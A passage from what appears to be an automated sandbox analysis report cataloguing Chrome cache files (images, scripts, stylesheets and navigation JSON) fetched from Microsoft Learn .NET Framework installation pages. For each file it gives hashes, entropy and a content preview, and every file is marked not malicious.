features."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-03-31T04:00:00.000Z","paths":["/azure/dev-box/*"],"startDate":"2024-02-20T23:00:00.000Z"},"uid":"938234 live"},{"content":{"link":{"href":"https://aka.ms/MSLear

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	downloaded
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
URL:	https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 124

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
URL:	https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 125

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 126

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://learn.microsoft.com/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 127

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1300 x 300, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	81913
Entropy (8bit):	7.909044687847068
Encrypted:	false
SSDEEP:	1536:dKVqOVA4kDFNEgVzMoz1Olnr8AN5yl7UWBrZtLbqO0vPU9dADS/5een:au5DFj4ozot8AO9UWBDqOYPWB/5eq
MD5:	049412F03408193F0103637411B42627
SHA1:	540DA51436D5A9E305BB113FD522B91448348813
SHA-256:	BA778D4F93DBB62ED50333A967DBC34BB1FD5C9B45ED90B7366D72BD6A2955DB
SHA-512:	90F11094E997CBFA3593FE6A365B0D942EE03EAA9512AB73C0B6D7CAE409F7E0B2B15118944FB4DC113169F2BA900EBBCE9BEC8EE34C3832C5579F217B784AED
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/event-banners/banner-build-2024.png?branch=live
Preview:	.PNG........IHDR.......,......^......zTXtRaw profile type exif..x.mPA.. ...>...<..L.......;......n.T....5t..Qw.......c#X3;...=r....3..>..U...u..D$.2..<:...F.FLQ(i..[.L.....gh,.$:..._\|z...0....E.<..w..L.~.....#Ci...7..../.YMO.......iCCPICC profile..x.}.=H.@.._S."..v..:Y..q...Bi+..`r..4iHR\......U..g].\.A.....I.EJ._Rh...q?..{...f..f...j..N..\~U....B.@..L=.Y..s\|.......>...T.&.\|".....x.xf..9...YYR..... .#.e..8...xf.....b....feC%.&..F.B.e...g.Zg.{.....J..4#H`.I. BF..Ta!F.F..4..=.#.?E..\.0r,...........I7)..z_l.c......m...v...?.WZ._k....7:Z...m....M...w..']2$G....E....).....kno.}.>.Y.j..88..J.........=......r.......viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 4.4.0-Exiv2">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/Resourc

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	5690
Entropy (8bit):	4.813031529066858
Encrypted:	false
SSDEEP:	96:ogtBAAQyXpcI3aDNjExAjfWQpL0dpwmWMv7BRevy8RJNjvZPyJ2tlh7RewZUZSex:ogt6cpcUaDNjESLWQN0dpwm99qllVR7W
MD5:	F42D394130C9AE372121C3758F7E266C
SHA1:	E36A7E780DF38D21BF955099234684147D88A857
SHA-256:	5D785C46FC1C27EB4A0862D554BD5CBCDA0847B9130E941FABD811F1BE3543CE
SHA-512:	9E310059A262BC2A3ED8CD8FC25AB4D16569A1C2AB38507D6CC66D9BB9FDB0258337699569058ECB0CAA6BE73F0AEA19B0F7F2E9636083AC78708029524CBDB7
Malicious:	false
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-featured-assessment","description":"Wherever you are in your AI journey, Microsoft Learn meets you where you are and helps you deepen your skills.","href":"/assessments/1c032171-8ca0-4032-8962-a38a5cc424a8/","supertitle":"Featured assessment","title":"It\u0027s your AI learning journey"}],"metadata":{"git_commit_id":"6e98cc35bf03910fbaf88c477e2d27b08d304968"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 131

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (31341), with no line terminators
Category:	dropped
Size (bytes):	31341
Entropy (8bit):	4.892781786468702
Encrypted:	false
SSDEEP:	384:FGvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdDw:whOEO8chkMet7pCjBfFw
MD5:	40998D414F58B4779CB09C4FD275B92E
SHA1:	5D91AAF653083BD6A569852C0E62341F4F313655
SHA-256:	DD7F4EDCF142A2D2A22E386A7F3A7255B018B71300B53BEFA44C157164FFE5DC
SHA-512:	5BD7B3D4A3B141C315908E9BD7219927C4BD733A3835772BDA6DB3CD78B3D99CA268BC16DBD44EF4228FAC311FE02C429C6CFFC76F576F489A3486F1DEF9B0E7
Malicious:	false
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/the-net-framework-and-out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"}],"toc_title":"By OS version"},{"href":"install/repair","toc_title":"Repair .NET f

Chrome Cache Entry: 132

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	5690
Entropy (8bit):	4.813031529066858
Encrypted:	false
SSDEEP:	96:ogtBAAQyXpcI3aDNjExAjfWQpL0dpwmWMv7BRevy8RJNjvZPyJ2tlh7RewZUZSex:ogt6cpcUaDNjESLWQN0dpwm99qllVR7W
MD5:	F42D394130C9AE372121C3758F7E266C
SHA1:	E36A7E780DF38D21BF955099234684147D88A857
SHA-256:	5D785C46FC1C27EB4A0862D554BD5CBCDA0847B9130E941FABD811F1BE3543CE
SHA-512:	9E310059A262BC2A3ED8CD8FC25AB4D16569A1C2AB38507D6CC66D9BB9FDB0258337699569058ECB0CAA6BE73F0AEA19B0F7F2E9636083AC78708029524CBDB7
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-featured-assessment","description":"Wherever you are in your AI journey, Microsoft Learn meets you where you are and helps you deepen your skills.","href":"/assessments/1c032171-8ca0-4032-8962-a38a5cc424a8/","supertitle":"Featured assessment","title":"It\u0027s your AI learning journey"}],"metadata":{"git_commit_id":"6e98cc35bf03910fbaf88c477e2d27b08d304968"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":

Chrome Cache Entry: 133

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 134

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	439003
Entropy (8bit):	5.080184119276113
Encrypted:	false
SSDEEP:	6144:seRpljKCeWeLfn7AEYh6BFPDxZYX04GK7Mb:VKCeWkn7T
MD5:	28B3D9EF4FB3FE3AA48C704124C2BCD5
SHA1:	F1148DB35D3165F3D6C50545408E5C79EFFB56AE
SHA-256:	E84AB90255653A651CCCC086CDDB6307AF2655D86DA25575440EEF70987EEE17
SHA-512:	9B5468AA20E0863E0B9746B8DECF534F318F2C2A89884A838CF9580EF71C17F769CDB295AF08617ED48AC674D797D7D9F5BF597EDE2F55904A4CA0F48692D353
Malicious:	false
URL:	https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/281396a.site-ltr.css
Preview:	.CodeMirror{color:#000;direction:ltr;height:300px;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{text-align:right;color:#999;white-space:nowrap;min-width:20px;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{border-left:1px solid #000;border-right:none;width:0}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{background:#7e7;width:auto;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection{background:0 0}.cm-fat-cursor .CodeMirror-line>span::selection{background:0 0}.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0

Chrome Cache Entry: 135

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 136

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46320), with CRLF line terminators
Category:	downloaded
Size (bytes):	2173173
Entropy (8bit):	5.5032312539802515
Encrypted:	false
SSDEEP:	49152:TLBHrsWON9DbSB1DkCXWXbUkENgrUj0N+:HWvSB1DkCXWXM
MD5:	709FA5C714C45448B373BEEE3140EE92
SHA1:	23EFAC51464D20A6D83710EDE0A99C25B2163149
SHA-256:	E3E3EA4EB651CF8D457CD5B3C730BD04576A1ACE34E3ED94ABA220A250E801A4
SHA-512:	DF8B1B8297A20883AFDAB38EE13C8A6163F26858FC637158D0DAA1F4A366ABD2D528725FCBD59D8AF7C2AAF10FECE599B4C05A71BEB1295DC30DD4C7BB803ECE
Malicious:	false
URL:	https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/527f3f8.index-docs.js
Preview:	"use strict";(()=>{var L$e=Object.create;var $v=Object.defineProperty;var B4=Object.getOwnPropertyDescriptor;var R$e=Object.getOwnPropertyNames;var M$e=Object.getPrototypeOf,D$e=Object.prototype.hasOwnProperty;var $$e=(e,t,o)=>t in e?$v(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var De=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports),N$e=(e,t)=>{for(var o in t)$v(e,o,{get:t[o],enumerable:!0})},q$e=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of R$e(t))!D$e.call(e,r)&&r!==o&&$v(e,r,{get:()=>t[r],enumerable:!(n=B4(t,r))\|\|n.enumerable});return e};var Hp=(e,t,o)=>(o=e!=null?L$e(M$e(e)):{},q$e(t\|\|!e\|\|!e.__esModule?$v(o,"default",{value:e,enumerable:!0}):o,e));var Y=(e,t,o,n)=>{for(var r=n>1?void 0:n?B4(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&$v(t,o,r),r};var yc=(e,t,o)=>($$e(e,typeof t!="symbol"?t+"":t,o),o);var MU=De((LU,RU)=>{(function(e,t){typeof LU=="object"&&typeof RU<"u"?RU.exports=t():typeof de

Chrome Cache Entry: 137

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	4945
Entropy (8bit):	4.796097221456048
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dptAdSlkepQnymoLByzVqrpCvJ4QG62HxpJjJ+do88HxbqK:dgQ+KfZcbhaWjptAdSlkepQnNgByz8FB
MD5:	EF6E83E1C6E863A122281F71DD8020B4
SHA1:	CEA054B197D99548088012C2E011F3BA5DB8CE60
SHA-256:	B22DAC9B489D9184B1FFE6A4981CAE6C350557D2E7B3378FED8B2A20D41DEB70
SHA-512:	8C69422E55648BC875937D5A51B6D9E76A3019A8147E44D7BA29811772950A06A7A86EDB73319C91D27EB9E561565298977E295E5486770B76007DF108EE4D27
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and 